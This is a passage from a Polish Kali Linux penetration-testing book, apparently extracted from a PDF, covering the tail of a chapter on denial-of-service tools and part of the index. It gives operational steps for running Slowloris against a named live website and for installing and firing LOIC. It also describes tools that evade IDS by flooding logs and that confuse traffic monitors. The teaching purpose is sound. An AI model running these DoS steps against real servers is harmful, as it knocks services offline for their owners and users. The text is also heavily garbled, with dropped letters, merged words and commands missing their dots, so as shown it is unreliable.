Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

